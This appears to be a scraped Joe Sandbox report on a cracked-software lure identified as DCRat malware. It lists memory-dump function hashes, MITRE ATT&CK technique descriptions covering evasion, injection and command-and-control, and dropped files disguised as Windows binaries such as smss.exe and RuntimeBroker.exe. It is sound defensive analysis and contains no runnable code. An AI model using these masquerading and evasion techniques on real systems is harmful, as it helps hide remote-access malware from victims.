Snapshot File: hcaresult_50_2_7ff88815c000_smss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88aee399057a8ae294d7c21b75ba5aea158a791c35857b1981143dab32966a3c
Instruction ID: eb313fa51ea54173d71d61ea0ebcba520c70f93b69b9be3d42a6215a0afc0e5b
Opcode Fuzzy Hash: 88aee399057a8ae294d7c21b75ba5aea158a791c35857b1981143dab32966a3c
Instruction Fuzzy Hash: 62D0121CE0E65789F1385621403233E1E917F493C1E24047DD05F418C1CF1CF641E30A

Function 00007FF888156C5B Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000032.00000002.2543660952.00007FF888154000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888154000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_50_2_7ff888154000_smss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2dc97d8ece9ed4358c83bf9f14867a9ab81b3ae56c4a09ab9baac07dd1c8f2ae
Instruction ID: d90f704ce3dba082f796c190b8d27b813f610e59e47f1951253ddc4ab0268d82
Opcode Fuzzy Hash: 2dc97d8ece9ed4358c83bf9f14867a9ab81b3ae56c4a09ab9baac07dd1c8f2ae
Instruction Fuzzy Hash: 9ED0C91CA0E54785F9788641C4706396FA0FF01780E64417DD09F418C1CF2CB901E69D

Function 00007FF887D73E51 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000032.00000002.2367994017.00007FF887D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_50_2_7ff887d70000_smss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3aa692c0ff5c52b77032b892973327a545194d2031ac1028f976a51b2e6cfa6
Instruction ID: 3f06d3468ed2a812da59ab346120415957879ffa14179f7952ea51b014193847
Opcode Fuzzy Hash: c3aa692c0ff5c52b77032b892973327a545194d2031ac1028f976a51b2e6cfa6
Instruction Fuzzy Hash: 80C08C00E0891A42E5187724802037E00D29B84B84F808132E00FC63CBCF0C680202CB

Function 00007FF888167B5E Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000032.00000002.2543660952.00007FF888165000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888165000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_50_2_7ff888165000_smss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 274f32646a1985f1f914b7267d66724a7edc3cd2836d6655ccb5453a659b9f83
Instruction ID: 29f78d730c5891bd11f7f984fb595cae311ecc1239c06d083de1147ce9f215d1
Opcode Fuzzy Hash: 274f32646a1985f1f914b7267d66724a7edc3cd2836d6655ccb5453a659b9f83
Instruction Fuzzy Hash: 74C08C2480C6838FF317C32080212353FA1AF013C0F348AB9C48E8A9E2CF283941D219

Function 00007FF887D706C8 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000032.00000002.2367994017.00007FF887D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_50_2_7ff887d70000_smss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cac97728a2d1ed6d51a271aecfd2584ed47f4aa2bea0e50c0b26995a7955d98f
Instruction ID: 7ff7a4a8e3ba633800eb1d9509154de1ceaf214e72bdcb026877e15797823d4a
Opcode Fuzzy Hash: cac97728a2d1ed6d51a271aecfd2584ed47f4aa2bea0e50c0b26995a7955d98f
Instruction Fuzzy Hash: FCB01200CD640F00A404317A08430BCB0607F441C4FC40270D80E400C9D84D10D48242

Function 00007FF88816708A Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000032.00000002.2543660952.00007FF888165000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888165000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_50_2_7ff888165000_smss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1cf08c5dfa89baf46002c78d54288fdc8aa1a1eba49131ee14d706add641581
Instruction ID: a4ccd72e4fce4f901711d9ce1935aa1037d57a2667d6bf158df5696f459909a2
Opcode Fuzzy Hash: e1cf08c5dfa89baf46002c78d54288fdc8aa1a1eba49131ee14d706add641581
Instruction Fuzzy Hash: 71C04C44E1D34756E62251A0045403C1D812F06180F550F79D59A895D3EE487804D229

Function 00007FF88815DF2F Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000032.00000002.2543660952.00007FF88815C000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF88815C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_50_2_7ff88815c000_smss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6579adfd6ddc140ea5d55b7b359c3490dcbdfaf6b9b979327f76d70010d4211a
Instruction ID: a6c8927d38c959243c9fbb74944be1d984a84eae4ae50cc69fead25beb5b0680
Opcode Fuzzy Hash: 6579adfd6ddc140ea5d55b7b359c3490dcbdfaf6b9b979327f76d70010d4211a
Instruction Fuzzy Hash: 49C09248F0E3835BEB3115B058D207C0E802F57380F9909B2D10A8A2D3EE4C7806D32E

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report NursultanAlphaCrack.bat.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: DCRat

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\AutoIt3\Include\0a62118e203df5

C:\Program Files (x86)\AutoIt3\Include\GKcQVcpwHdHgqKNzncXgLOYQsT.exe

C:\Program Files\Windows NT\69ddcba757bf72

C:\Program Files\Windows NT\smss.exe

C:\Program Files\Windows Sidebar\Gadgets\9e8d7a4ca61bd9

C:\Program Files\Windows Sidebar\Gadgets\RuntimeBroker.exe

C:\Program Files\WindowsPowerShell\0a62118e203df5

C:\Program Files\WindowsPowerShell\GKcQVcpwHdHgqKNzncXgLOYQsT.exe

C:\Recovery\0a62118e203df5

C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\BlockcontainerWin.exe.log

Windows Analysis Report
NursultanAlphaCrack.bat.exe

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre